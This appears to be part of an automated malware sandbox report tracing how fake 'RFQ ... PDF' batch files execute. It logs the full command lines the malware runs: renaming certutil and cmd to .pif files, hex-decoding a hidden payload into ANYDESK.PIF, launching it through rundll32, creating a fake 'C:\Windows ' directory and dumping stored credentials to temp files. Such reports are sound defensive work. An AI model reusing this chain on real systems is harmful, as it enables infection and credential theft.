Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0040D322 | 49_2_0040D322 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0044A4F0 | 49_2_0044A4F0 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0043A5AB | 49_2_0043A5AB |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_00413631 | 49_2_00413631 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_00446690 | 49_2_00446690 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0044A730 | 49_2_0044A730 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_004398D8 | 49_2_004398D8 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_004498E0 | 49_2_004498E0 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0044A886 | 49_2_0044A886 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0043DA09 | 49_2_0043DA09 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_00438D5E | 49_2_00438D5E |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_00449ED0 | 49_2_00449ED0 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0041FE83 | 49_2_0041FE83 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_00430F54 | 49_2_00430F54 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_004050C2 | 53_2_004050C2 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_004014AB | 53_2_004014AB |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_00405133 | 53_2_00405133 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_004051A4 | 53_2_004051A4 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_00401246 | 53_2_00401246 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_0040CA46 | 53_2_0040CA46 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_00405235 | 53_2_00405235 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_004032C8 | 53_2_004032C8 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_00401689 | 53_2_00401689 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_00402F60 | 53_2_00402F60 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A220B4 | 60_2_02A220B4 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0042809D | 62_2_0042809D |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0045412B | 62_2_0045412B |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_004421C0 | 62_2_004421C0 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_004281D7 | 62_2_004281D7 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0043E1E0 | 62_2_0043E1E0 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0041E29B | 62_2_0041E29B |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_004373DA | 62_2_004373DA |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_00438380 | 62_2_00438380 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_00453472 | 62_2_00453472 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0042747E | 62_2_0042747E |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0043E43D | 62_2_0043E43D |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_004325A1 | 62_2_004325A1 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0043774C | 62_2_0043774C |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0041F809 | 62_2_0041F809 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_004379F6 | 62_2_004379F6 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_004279F5 | 62_2_004279F5 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0044DAD9 | 62_2_0044DAD9 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_00433C73 | 62_2_00433C73 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_00413CA0 | 62_2_00413CA0 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_00437CBD | 62_2_00437CBD |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0043DD82 | 62_2_0043DD82 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_00435F52 | 62_2_00435F52 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_00437F78 | 62_2_00437F78 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0043DFB1 | 62_2_0043DFB1 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06831143 | 62_2_06831143 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06850697 | 62_2_06850697 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0686F2CB | 62_2_0686F2CB |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0686920E | 62_2_0686920E |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06868268 | 62_2_06868268 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06884300 | 62_2_06884300 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0685830C | 62_2_0685830C |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_068310BC | 62_2_068310BC |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0687304E | 62_2_0687304E |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06859065 | 62_2_06859065 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0686F06E | 62_2_0686F06E |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0684F129 | 62_2_0684F129 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0686EE3F | 62_2_0686EE3F |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06858F2B | 62_2_06858F2B |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0686EC10 | 62_2_0686EC10 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06864B01 | 62_2_06864B01 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_06858883 | 62_2_06858883 |
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF | |
Source: C:\Users\Public\rdha.pif | Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 | |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd"" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " | |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF | |
Source: C:\Users\Public\rdha.pif | Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 | |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 | Jump to behavior |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 | Jump to behavior |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | Jump to behavior |
Source: C:\Users\Public\alpha.pif | Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"" | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd"" | Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" | Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 | Jump to behavior |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 | |
Source: C:\Users\Public\alpha.pif | Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 | |
Source: C:\Users\Public\rdha.pif | Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" | |
Source: C:\Users\Public\ANYDESK.PIF | Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe | |
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\Public\expha.pif | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Users\Public\expha.pif | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Users\Public\expha.pif | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: certcli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptui.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: ntdsapi.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: certca.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: dsrole.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: certcli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptui.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: ntdsapi.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: certca.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: dsrole.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\Public\ghf.pif | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\PING.EXE | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: zipfldr.dll | Jump to behavior |
Source: C:\Users\Public\rdha.pif | Section loaded: propsys.dll | Jump to behavior |
